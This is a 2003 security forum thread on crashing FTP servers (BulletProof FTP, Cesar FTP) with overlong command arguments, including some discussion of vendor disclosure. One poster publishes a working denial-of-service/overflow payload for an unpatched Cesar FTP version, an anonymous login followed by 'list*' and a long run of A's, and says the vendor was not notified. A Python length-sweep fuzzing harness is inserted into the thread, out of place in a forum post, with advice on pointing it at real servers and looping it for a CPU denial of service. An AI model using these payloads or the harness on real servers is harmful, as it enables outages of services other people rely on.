First of all, sorry for my English. I'm trying to hack or crash an FTP server (BulletProof FTP Server); no, it's not a real hack, because it's on my own PC. I'm researching how to find exploits.
I tried to cause a buffer overflow by sending too many characters, e.g.: USER AAAAAAAAAAAAAAAAAAA... PASS BBBBBBBBBBBBBBBBBBB... LS AAAAAAAAAAAAAAAAAAAAA...
I also tried Windows device names (it's running on Windows), but it always said directory forbidden: LS /AUX/AUX, CD CON/CON, CD CLOCK$, LS CONFIG$, and the same with LPTn, COMn, PRN...
The last thing I tried was a format string exploit, %f%x%x (or something like it). But I don't really understand this; can anyone explain it to me?
Does anyone know other methods to try? I think it's easier to crash the server first, then try to hack it.
Greetings, thanks for everything!
beardednose
Jul 16 2003, 12:36 PM
Leptom, welcome to the board. Your English is fine. No apologies necessary.
t0bban
Jul 18 2003, 10:57 AM
Leptom; I've got a few tricks up my sleeve to crash an FTP server, but I'm not sure it's so good to tell them just yet. I've notified the vendor and hopefully they'll reply to me that they're fixing it within the next week; otherwise I'll make the bug public, which means that they (the vendor) need to get started. Post me a message in a week or so and I'll tell you all.
Now you're probably thinking "What a fooker, ain't sharing", but my goal isn't to be destructive, but rather to be constructive. Hope you understand my position on this board.
Leptom
Jul 21 2003, 07:51 AM
Thank you, I understand your position. It's the most correct one (I think) if the vendor doesn't have the patch. I will be waiting for news from you.
Thanks again
t0bban
Jul 30 2003, 01:58 PM
Still no news from the vendor... Might just release it then. At work now, but perhaps when I get home. But I'd rather not, because it can crash the specified FTP server (which is BulletProof FTP Server (G6)) in a matter of seconds. And that's not what I want; I want the problem fixed, y'know.
ComSec
Jul 30 2003, 03:24 PM
t0bban... have you reported it to Bugtraq or CERT yet? If the vendor doesn't respond to repeated e-mails, then you have no option but to go public... That soon gets them moving...
Leptom
Jul 31 2003, 07:51 AM
I understand the problem. I only want to learn about finding exploits... but others may want to crash real FTP servers. Don't hurry on my account; don't worry, I can wait :-) Thanks
t0bban
Jul 31 2003, 08:13 AM
No reply so far. I haven't posted the issue on Bugtraq yet. I don't want to go public with this until there's a patch out, even if it means increased speed in developing a patch, because all our FTP servers are of that kind (which is how we discovered the bug).
ComSec
Jul 31 2003, 10:40 AM
QUOTE (t0bban @ Jul 31 2003, 08:13 AM)
No reply so far. I haven't posted the issue on Bugtraq yet. I don't want to go public with this until there's a patch out, even if it means increased speed in developing a patch, because all our FTP servers are of that kind (which is how we discovered the bug).
If you have identified and isolated the problem, then why not make a patch yourself?
t0bban
Jul 31 2003, 02:57 PM
Because I wouldn't know how to. And it's nothing I've got time to spare doing either. I'm working 8 hrs a day, then I get home, change, go to the golf course, then I go home and sleep.
GSecur
Jul 31 2003, 04:07 PM
All you have to do is send an e-mail with your findings to bugtraq@securityfocus.com
what
Aug 10 2003, 06:01 AM
Well, I just wanted to report some of my own findings on the way that BPFTP processes its commands. This is what I had when I sent them to the server.
mdtm sssssssssssss
550 'sssssssssssss' : no such file or directory.
--no effect on server--
mdtm !sssssssssss
550 '!sssssssssss' : no such file or directory.
--no effect on server--
mdtm ~ssssssssssssssssssssssss
550 '~ssssssssssssssssssssssss' : no such file or directory.
--we could now be looking at a buffer overflow exploit or just DoS--
Again, these are just findings that I have found interesting. I am currently debating whether or not I should reveal an exploit in Cesar FTP (DoS/buffer overflow), but I am willing to trade info with those who are interested...
Most likely, I will post to Bugtraq later; the vendor can look at the posts just like everyone else.
what
Aug 10 2003, 04:54 PM
It seems that you can make the CPU usage go to 100% by issuing these commands very quickly and repeatedly in a longer format.
t0bban
Aug 10 2003, 07:43 PM
A simple DoS attack found here, perhaps? How do you send these commands to the FTP server, let's say if it's behind a firewall? Would it still be possible? What way do you normally send these commands?
what
Aug 11 2003, 02:50 PM
Typically, FTP servers are not hidden behind a firewall, but there are many ways you can bypass them using NMAP or FPipe by Foundstone. This is really just a simple DoS attack, but it should be stopped. I connect using telnet and then issue the commands. If this were automated through a rather simple program, then CPU usage would not only go up to but exceed 100%. The commands I use are shown above, through telnet. Such as:
C:\> telnet 255.255.255.225 21
If you use FTP, then issuing the commands will make the (local) FTP client crash. This is not useful to anyone.
I will work on a program to demonstrate later.
t0bban
Aug 11 2003, 03:26 PM
Great.
fUSiON
Aug 14 2003, 01:43 PM
Hi all,
I tried this command over telnet on my FTP server; it seems it doesn't work for G6 FTP Server, or does it?
(000002) 14.08.2003 15:36:20 - (not logged in) (127.0.0.1) > MDTM ~ssssssssssssssssssssssss
(000002) 14.08.2003 15:36:20 - (not logged in) (127.0.0.1) > 530 Please login with USER and PASS first.
(000002) 14.08.2003 15:36:29 - (not logged in) (127.0.0.1) > MDTM ~ssssssssssssssssssssss/a/~
(000002) 14.08.2003 15:36:29 - (not logged in) (127.0.0.1) > 530 Please login with USER and PASS first.
(000002) 14.08.2003 15:36:35 - (not logged in) (127.0.0.1) > MDTM ssssssssssssssssssssss/~
(000002) 14.08.2003 15:36:35 - (not logged in) (127.0.0.1) > 530 Please login with USER and PASS first.
Thanks
n1n1n1
Aug 14 2003, 04:30 PM
You should try to do what it wants you to do: 530 Please login with USER and PASS first.
Something else:
I don't see any bug here. "~" is the server root (I think) and "mdtm" shows the time and date this file/folder was created.
what
Aug 21 2003, 11:09 PM
I'm going to continue to play with BulletProof FTP; now it's just a matter of time...
Anyway, just because I feel bad, I will release my current exploit for Cesar FTP v0.99g (latest version). The server is fairly popular, but it is free, so many people like it (cheap). Anyway, here is what you need to do:
1. Connect with telnet
2. Log in (anonymous access works fine)
3. Issue this command:
list*AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
The vendor has not been notified. This IS the LATEST version of their software, and it is exploitable on all previous versions.
POSTED 8/21/03, currently exploitable.
I would like to see that BPFTP exploit you have, but we can wait...
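Everything in this thread so far is the same manual procedure: telnet to port 21, log in, send one command with a long argument (USER/PASS/LS in the first post, the MDTM probes, the `list*AAAA...` line for Cesar FTP), and watch whether the daemon answers, dies, or pins the CPU. The script below is an added example, not code from any poster or vendor here, that automates that length sweep and classifies each reply. Because the real servers are not available offline, it talks to a constructed in-process mock (`MockFtpHandler`) whose replies copy the transcripts above (530 before login, 550 for an unknown MDTM path) and whose crash threshold `CRASH_AT` is an assumed number that stands in for an overflow; the harness does not know that threshold and has to find it. Against a real target you would point `ftp_session` at its host and port instead, and a server that silently truncates long arguments, as Leptom reports later, simply keeps answering and the sweep reports no `DEAD` entry.

```python
"""Length-sweep probe harness for FTP command handlers (added example).

Constructed target: a tiny in-process FTP look-alike that drops the
connection when a command line exceeds CRASH_AT bytes, which is what a
crashing daemon looks like from the client side. The probe() sweep never
reads CRASH_AT; it discovers the first length at which replies stop.
"""
import socket
import socketserver
import threading

CRASH_AT = 600    # assumption: simulated overflow threshold, bytes per line
MAXLINE = 4096    # read cap so the mock itself cannot be overrun


class MockFtpHandler(socketserver.StreamRequestHandler):
    """Replies modelled on the BPFTP/G6 transcripts quoted in the thread."""

    def handle(self):
        self.wfile.write(b"220 mock ftpd ready\r\n")
        logged_in = False
        while True:
            line = self.rfile.readline(MAXLINE)
            if not line:
                return
            if len(line) > CRASH_AT:
                return                         # simulated crash: no reply, socket closes
            verb, _, arg = line.rstrip(b"\r\n").partition(b" ")
            verb = verb.upper()
            if verb == b"USER":
                self.wfile.write(b"331 Password required\r\n")
            elif verb == b"PASS":
                logged_in = True
                self.wfile.write(b"230 Logged in\r\n")
            elif not logged_in:
                self.wfile.write(b"530 Please login with USER and PASS first.\r\n")
            elif verb == b"MDTM":
                self.wfile.write(b"550 '" + arg + b"' : no such file or directory.\r\n")
            elif verb == b"QUIT":
                self.wfile.write(b"221 Bye\r\n")
                return
            else:
                self.wfile.write(b"200 OK\r\n")


def start_mock():
    """Start the mock on a free loopback port; returns (server, port)."""
    srv = socketserver.ThreadingTCPServer(("127.0.0.1", 0), MockFtpHandler)
    srv.daemon_threads = True
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, srv.server_address[1]


def ftp_session(host, port, timeout=2.0):
    """Open a control connection and consume the banner."""
    sock = socket.create_connection((host, port), timeout=timeout)
    rfile = sock.makefile("rb")
    rfile.readline()
    return sock, rfile


def send_cmd(sock, rfile, line):
    """Send one command line; return the raw reply, or None if the server vanished."""
    try:
        sock.sendall(line + b"\r\n")
        reply = rfile.readline()
    except OSError:                            # reset, timeout, broken pipe
        return None
    return reply or None                       # b"" is EOF: the daemon went away


def probe(host, port, verb, lengths, pattern=b"A", sep=b" ",
          login=(b"anonymous", b"x")):
    """Sweep argument lengths for one verb, one fresh session per length.

    Returns [(length, status)], where status is the 3-digit reply code as a
    string or 'DEAD' when the server closed the connection without answering.
    sep=b"" reproduces payloads glued to the verb, like list*AAAA...
    """
    results = []
    for n in lengths:
        sock, rfile = ftp_session(host, port)
        send_cmd(sock, rfile, b"USER " + login[0])
        send_cmd(sock, rfile, b"PASS " + login[1])
        reply = send_cmd(sock, rfile, verb + sep + pattern * n)
        results.append((n, "DEAD" if reply is None else reply[:3].decode()))
        sock.close()
    return results


def first_dead(results):
    """Smallest argument length whose probe got no reply, or None."""
    return next((n for n, status in results if status == "DEAD"), None)


if __name__ == "__main__":
    srv, port = start_mock()
    sweep = probe("127.0.0.1", port, b"MDTM", [16, 64, 256, 512, 1024, 2048])
    for n, status in sweep:
        print(f"MDTM + {n:5d} bytes -> {status}")
    print("first length with no reply:", first_dead(sweep))
    srv.shutdown()
```

Each length gets its own session so that a crash at one size cannot mask the result at the next, and the classification is by reply code rather than by text, since the interesting transitions are 550 (handled), 200/other (accepted) and DEAD (connection gone). Against a real daemon, run the sweep with the process under a debugger or with Task Manager open: DEAD at a consistent length points at an overflow worth looking at; a CPU spike with normal replies is the resource DoS described above, and the sweep can be looped to reproduce it.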
alexpower
Aug 31 2003, 09:33 AM
Can someone help me hack an FTP too, please?
Leptom
Sep 2 2003, 08:07 AM
Hi,
I'm back from holidays. I was trying: MDTM ~ssssssssssssssssssssssss. But ftpd only takes a limited number of characters; if you send more than that, it ignores them. Bye